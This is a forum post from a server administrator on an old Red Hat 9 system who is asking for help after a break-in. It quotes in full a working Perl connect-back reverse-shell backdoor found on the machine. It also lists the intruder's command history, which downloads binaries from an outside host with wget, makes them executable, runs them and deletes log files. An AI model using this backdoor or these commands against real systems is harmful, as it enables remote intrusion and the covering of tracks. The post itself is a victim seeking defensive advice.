Hi there,
I had my server hacked , I found this script that was run as root:
#!/usr/bin/perl
# Data Cha0s Perl Connect Back Backdoor
# Unpublished/Unreleased Source Code
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("[-] Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("[-] Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Detached\n\n";
and some other files like ion, mremap_pte which are binaries, I was able to get the IP of the hacker but looking at
www.ripe.net did not give me any info.
I believe the hacker got in through httpd, and was able to copy and make executable the files in tmp directory, do you think is there a way that I could stop all this, sure I will reinstall the red hat 9 operting system with all the patches but I hae done before with no luck
I found the last command executed by the hacker:
cat /etc/*version*
cat /etc/issue
w
exit
cat /etc/issue
id
cd /tmp
wget el33tbr.port5.com/a/index.
html
wget el33tbr.port5.com/ion
chmod 777 ion
./ion index.html
w
rm -rf /var/tmp/logs/*.*
thanks for your time
Start Free Trial
